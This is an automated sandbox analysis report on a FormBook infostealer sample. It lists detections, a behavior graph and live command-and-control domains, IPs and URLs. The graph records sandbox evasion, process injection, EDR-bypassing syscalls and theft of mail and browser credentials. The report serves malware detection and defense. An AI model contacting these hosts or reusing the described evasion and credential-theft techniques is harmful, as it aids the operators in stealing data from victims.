                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589075 Sample: xaqnaB0rcW.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 28 www.binjai77rtp11f.xyz 2->28 30 www.vietnamtour.pro 2->30 32 12 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 3 other signatures 2->50 10 xaqnaB0rcW.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->64 66 Writes to foreign memory regions 10->66 68 2 other signatures 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 HSxcaEmiOTH.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 TCPSVCS.EXE 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 HSxcaEmiOTH.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 rokeyfashion.store 103.159.36.66, 49986, 49987, 49988 TWIDC-AS-APTWIDCLimitedHK unknown 22->34 36 b1-3-r111.kunlundns.top 101.32.205.61, 49982, 49983, 49984 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN China 22->36 38 4 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                xaqnaB0rcW.exe59%VirustotalBrowse
                xaqnaB0rcW.exe83%ReversingLabsWin32.Trojan.AutoitInject
                xaqnaB0rcW.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.rwse6wjx.sbs/gtil/?LRJdx=qxGHfdRH_npdPLS&UfjxuDP=yyp7zDkplnhFTYOX3ExWxIUq0IjfKVeUoM/g1Z3Itn+WrDb/JBNc3lr1wwtaU5LmbkDFl3V0HSUPXljFvyI/+0E8p+6jedrKHm5NubPBlXEWe4lmKrOCn9YHOrHb1DBA91+ELFM00oq50%Avira URL Cloudsafe
                http://www.rokeyfashion.store0%Avira URL Cloudsafe
                http://www.rokeyfashion.store/nfd2/0%Avira URL Cloudsafe
                http://www.rokeyfashion.store/nfd2/?UfjxuDP=Nz4SRZ+ZcsWDvLDLaExFXoqxLF9RdDOa1L87IpfF7DS4rl0CQqW5nKUTlgEwSOCJB6dlUsv6D3EsaGzmyQ5ZH6APjZoiCJja95RSvj5+jnDMDZLlQYpKd2QqndCwykWooVuOpC6xjiJx&LRJdx=qxGHfdRH_npdPLS0%Avira URL Cloudsafe
                https://shorty.bio/zSKcZ70%Avira URL Cloudsafe
                http://www.showyourstyle.top/zbqa/0%Avira URL Cloudsafe
                http://www.binjai77rtp11f.xyz/9fei/?UfjxuDP=9hwMTPf/o+GewSNr0PZcNyjUpNs4oV11JaaOJ/4hdktbA5fMK3ajxj9W7lKuvaKLl9eyr3kbg9/8Pn7CG+MHJwFOLy3VCtOxW9qlL7MmBkbbL06rPuqE58QtHe+NUuoOX41pN6Zc3VUv&LRJdx=qxGHfdRH_npdPLS0%Avira URL Cloudsafe
                http://www.vietnamtour.pro/wmxx/0%Avira URL Cloudsafe
                http://www.rwse6wjx.sbs/gtil/0%Avira URL Cloudsafe
                http://www.binjai77rtp11f.xyz/9fei/0%Avira URL Cloudsafe
                http://www.vietnamtour.pro/wmxx/?LRJdx=qxGHfdRH_npdPLS&UfjxuDP=zdZDiDz9NcDAxdPT/uWXYjOZ7xdg3NSLew0AnBcQq7wq0cWPcv1qrwj1W7YWM/gj4sM+0wouZwjbIFjwenXJ4N4USgfIRCAFwiyvEbCB1BK26HZp+qINnmDOYTAlL9plemOtuNo0oYKs0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.showyourstyle.top
                		69.57.163.64
                		truetrue
                  		unknown
                  rokeyfashion.store
                  		103.159.36.66
                  		truetrue
                    		unknown
                    www.binjai77rtp11f.xyz
                    		104.21.28.65
                    		truetrue
                      		unknown
                      b1-3-r111.kunlundns.top
                      		101.32.205.61
                      		truetrue
                        		unknown
                        www.vietnamtour.pro
                        		104.21.54.126
                        		truetrue
                          		unknown
                          www.3nhc3a.top
                          		20.2.208.137
                          		truefalse
                            		unknown
                            www.rwse6wjx.sbs
                            		unknown
                            		unknownfalse
                              		unknown
                              www.rokeyfashion.store
                              		unknown
                              		unknownfalse
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://www.rokeyfashion.store/nfd2/?UfjxuDP=Nz4SRZ+ZcsWDvLDLaExFXoqxLF9RdDOa1L87IpfF7DS4rl0CQqW5nKUTlgEwSOCJB6dlUsv6D3EsaGzmyQ5ZH6APjZoiCJja95RSvj5+jnDMDZLlQYpKd2QqndCwykWooVuOpC6xjiJx&LRJdx=qxGHfdRH_npdPLStrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.rokeyfashion.store/nfd2/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.rwse6wjx.sbs/gtil/?LRJdx=qxGHfdRH_npdPLS&UfjxuDP=yyp7zDkplnhFTYOX3ExWxIUq0IjfKVeUoM/g1Z3Itn+WrDb/JBNc3lr1wwtaU5LmbkDFl3V0HSUPXljFvyI/+0E8p+6jedrKHm5NubPBlXEWe4lmKrOCn9YHOrHb1DBA91+ELFM00oq5true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.binjai77rtp11f.xyz/9fei/?UfjxuDP=9hwMTPf/o+GewSNr0PZcNyjUpNs4oV11JaaOJ/4hdktbA5fMK3ajxj9W7lKuvaKLl9eyr3kbg9/8Pn7CG+MHJwFOLy3VCtOxW9qlL7MmBkbbL06rPuqE58QtHe+NUuoOX41pN6Zc3VUv&LRJdx=qxGHfdRH_npdPLStrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.rwse6wjx.sbs/gtil/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.vietnamtour.pro/wmxx/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.showyourstyle.top/zbqa/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.binjai77rtp11f.xyz/9fei/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.vietnamtour.pro/wmxx/?LRJdx=qxGHfdRH_npdPLS&UfjxuDP=zdZDiDz9NcDAxdPT/uWXYjOZ7xdg3NSLew0AnBcQq7wq0cWPcv1qrwj1W7YWM/gj4sM+0wouZwjbIFjwenXJ4N4USgfIRCAFwiyvEbCB1BK26HZp+qINnmDOYTAlL9plemOtuNo0oYKstrue
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://cdn.jsdelivr.net/npm/TCPSVCS.EXE, 00000005.00000002.2604587139.0000000003996000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2606302024.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmpfalse
                                  		high
                                  https://cdn.livechatinc.com/tracking.jsTCPSVCS.EXE, 00000005.00000002.2604587139.0000000003996000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2606302024.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/chrome_newtabTCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://cdnjs.cloudflare.com/ajax/libs/jquery.lazy/1.7.9/jquery.lazy.plugins.min.jsTCPSVCS.EXE, 00000005.00000002.2604587139.0000000003996000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2606302024.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/ac/?q=TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://cdn.jsdelivr.net/npm/bootstrapHSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.0/jquery.min.jsTCPSVCS.EXE, 00000005.00000002.2604587139.0000000003996000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2606302024.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmpfalse
                                                		high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://cdnjs.cloudflare.com/ajax/libs/jquery.lazy/1.7.9/jquery.lazy.min.jsTCPSVCS.EXE, 00000005.00000002.2604587139.0000000003996000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2606302024.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    		high
                                                    https://shorty.bio/zSKcZ7HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.rokeyfashion.storeHSxcaEmiOTH.exe, 00000006.00000002.2604361912.0000000005578000.00000040.80000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.ecosia.org/newtab/TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://ac.ecosia.org/autocomplete?q=TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchTCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.livechatinc.com/chat-with/13793973/TCPSVCS.EXE, 00000005.00000002.2604587139.0000000003996000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2606302024.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://www.livechatinc.com/?welcomeTCPSVCS.EXE, 00000005.00000002.2604587139.0000000003996000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.2606302024.0000000005C10000.00000004.00000800.00020000.00000000.sdmp, HSxcaEmiOTH.exe, 00000006.00000002.2602422660.0000000003656000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		high
                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=TCPSVCS.EXE, 00000005.00000002.2606515922.000000000745D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                69.57.163.64
                                                                		www.showyourstyle.topUnited States
                                                                		25653FORTRESSITXUStrue
                                                                20.2.208.137
                                                                		www.3nhc3a.topUnited States
                                                                		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                101.32.205.61
                                                                		b1-3-r111.kunlundns.topChina
                                                                		132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNtrue
                                                                103.159.36.66
                                                                		rokeyfashion.storeunknown
                                                                		134687TWIDC-AS-APTWIDCLimitedHKtrue
                                                                104.21.28.65
                                                                		www.binjai77rtp11f.xyzUnited States
                                                                		13335CLOUDFLARENETUStrue
                                                                104.21.54.126
                                                                		www.vietnamtour.proUnited States
                                                                		13335CLOUDFLARENETUStrue

                                                                General Information

                                                                Joe Sandbox version:42.0.0 Malachite
                                                                Analysis ID:1589075
                                                                Start date and time:2025-01-11 09:12:59 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 8m 42s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:10
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:2
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:xaqnaB0rcW.exe
                                                                renamed because original name is a hash value
                                                                Original Sample Name:dc710b8bed55e4cf0b6454836e15714ede75a8fa952d2756cb9b437425a6f6e9.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@7/3@8/6
                                                                EGA Information:
                                                                • Successful, ratio: 75%
                                                                HCA Information:
                                                                • Successful, ratio: 90%
                                                                • Number of executed functions: 48
                                                                • Number of non-executed functions: 301
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
                                                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                03:15:11API Interceptor1962366x Sleep call for process: TCPSVCS.EXE modified

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                69.57.163.6425IvlOVEB1.exeGet hashmaliciousFormBookBrowse
                                                                • www.expertguide.info/qr23/
                                                                AuKUol8SPU.exeGet hashmaliciousFormBookBrowse
                                                                • www.startsomething.xyz/9er8/
                                                                ofZiNLLKZU.exeGet hashmaliciousFormBookBrowse
                                                                • www.showyourstyle.top/zbqa/
                                                                3HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                                                                • www.startsomething.xyz/9er8/
                                                                DHL.exeGet hashmaliciousFormBookBrowse
                                                                • www.startsomething.xyz/9er8/
                                                                Salmebogs(1).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • www.openhorizons.pro/ir2n/
                                                                20.2.208.137Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                • www.b2iqd.top/g8fb/
                                                                MV Sunshine.exeGet hashmaliciousFormBookBrowse
                                                                • www.b2iqd.top/g8fb/
                                                                101.32.205.61YKzxWyqI6Y.exeGet hashmaliciousFormBookBrowse
                                                                • www.rwse6wjx.sbs/6xqt/
                                                                ofZiNLLKZU.exeGet hashmaliciousFormBookBrowse
                                                                • www.rwse6wjx.sbs/gtil/
                                                                SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                                • www.rwse6wjx.sbs/n0se/
                                                                103.159.36.66ofZiNLLKZU.exeGet hashmaliciousFormBookBrowse
                                                                • www.rokeyfashion.store/nfd2/
                                                                104.21.28.65ofZiNLLKZU.exeGet hashmaliciousFormBookBrowse
                                                                • www.binjai77rtp11f.xyz/9fei/

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                www.3nhc3a.topofZiNLLKZU.exeGet hashmaliciousFormBookBrowse
                                                                • 20.2.208.137
                                                                www.showyourstyle.topofZiNLLKZU.exeGet hashmaliciousFormBookBrowse
                                                                • 69.57.163.64
                                                                www.binjai77rtp11f.xyzofZiNLLKZU.exeGet hashmaliciousFormBookBrowse
                                                                • 104.21.28.65
                                                                www.vietnamtour.proofZiNLLKZU.exeGet hashmaliciousFormBookBrowse
                                                                • 172.67.138.138
                                                                b1-3-r111.kunlundns.topYKzxWyqI6Y.exeGet hashmaliciousFormBookBrowse
                                                                • 101.32.205.61
                                                                ofZiNLLKZU.exeGet hashmaliciousFormBookBrowse
                                                                • 101.32.205.61
                                                                SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                                • 101.32.205.61
                                                                ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 43.155.76.124
                                                                SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                • 43.155.76.124
                                                                PO-DC13112024_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                • 43.155.76.124
                                                                3NvALxFlHV.exeGet hashmaliciousFormBookBrowse
                                                                • 43.155.76.124
                                                                COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                                • 43.155.76.124
                                                                QUOTE2342534.exeGet hashmaliciousFormBookBrowse
                                                                • 129.226.56.200
                                                                COMMERCAIL INVOICE AND DHL AWB TRACKING DETAIL.exeGet hashmaliciousFormBookBrowse
                                                                • 129.226.56.200

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                TWIDC-AS-APTWIDCLimitedHKofZiNLLKZU.exeGet hashmaliciousFormBookBrowse
                                                                • 103.159.36.66
                                                                31.13.224.14-x86-2025-01-03T22_14_18.elfGet hashmaliciousMiraiBrowse
                                                                • 154.211.10.50
                                                                armv5l.elfGet hashmaliciousMiraiBrowse
                                                                • 103.155.98.87
                                                                loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                • 103.153.231.129
                                                                la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                                                • 103.156.125.183
                                                                la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                                                • 103.157.51.43
                                                                la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                • 103.155.172.227
                                                                la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                • 103.155.82.213
                                                                loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                • 103.153.202.21
                                                                loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                • 103.159.118.126
                                                                MICROSOFT-CORP-MSN-AS-BLOCKUS3.elfGet hashmaliciousUnknownBrowse
                                                                • 20.59.210.205
                                                                https://mrohailkhan.com/energyaustralia/auth/auhs1/Get hashmaliciousUnknownBrowse
                                                                • 13.107.246.45
                                                                6.elfGet hashmaliciousUnknownBrowse
                                                                • 20.206.82.79
                                                                6.elfGet hashmaliciousUnknownBrowse
                                                                • 40.76.46.130
                                                                phish_alert_sp2_2.0.0.0(4).emlGet hashmaliciousUnknownBrowse
                                                                • 52.102.11.124
                                                                https://maya-lopez.filemail.com/t/XhcWEjoRGet hashmaliciousUnknownBrowse
                                                                • 20.82.124.160
                                                                5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                                • 20.2.36.112
                                                                https://cocteldedeas.mx/rx567#cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                • 20.190.160.20
                                                                http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                • 40.126.32.68
                                                                Bontrageroutdoors_Project_Update_202557516.pdfGet hashmaliciousUnknownBrowse
                                                                • 40.126.32.72
                                                                TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNYKzxWyqI6Y.exeGet hashmaliciousFormBookBrowse
                                                                • 101.32.205.61
                                                                02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 101.35.209.183
                                                                suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                                • 101.35.209.183
                                                                https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8fGet hashmaliciousHTMLPhisherBrowse
                                                                • 170.106.97.195
                                                                https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8fGet hashmaliciousHTMLPhisherBrowse
                                                                • 170.106.97.196
                                                                ofZiNLLKZU.exeGet hashmaliciousFormBookBrowse
                                                                • 101.32.205.61
                                                                https://app.whirr.co/p/cm4711if90205nv0h2e4l0imuGet hashmaliciousUnknownBrowse
                                                                • 170.106.97.195
                                                                ReIayMSG__polarisrx.com_#7107380109.htmGet hashmaliciousHTMLPhisherBrowse
                                                                • 119.28.146.206
                                                                ReIayMSG__polarisrx.com_#6577807268.htmGet hashmaliciousHTMLPhisherBrowse
                                                                • 119.28.147.117
                                                                VM_MSG-Gf.htmGet hashmaliciousHTMLPhisherBrowse
                                                                • 119.28.147.117
                                                                FORTRESSITXUS25IvlOVEB1.exeGet hashmaliciousFormBookBrowse
                                                                • 69.57.163.64
                                                                AuKUol8SPU.exeGet hashmaliciousFormBookBrowse
                                                                • 69.57.163.64
                                                                ofZiNLLKZU.exeGet hashmaliciousFormBookBrowse
                                                                • 69.57.163.64
                                                                3HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                                                                • 69.57.163.64
                                                                Benefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                                • 69.57.162.6
                                                                miori.spc.elfGet hashmaliciousUnknownBrowse
                                                                • 69.72.254.176
                                                                sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                • 208.116.70.219
                                                                DHL.exeGet hashmaliciousFormBookBrowse
                                                                • 69.57.163.64
                                                                la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                • 65.98.32.221
                                                                Salmebogs(1).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                • 69.57.163.64

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Temp\164U99

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\TCPSVCS.EXE
                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                Category:modified
                                                                Size (bytes):196608
                                                                Entropy (8bit):1.1215420383712111
                                                                Encrypted:false
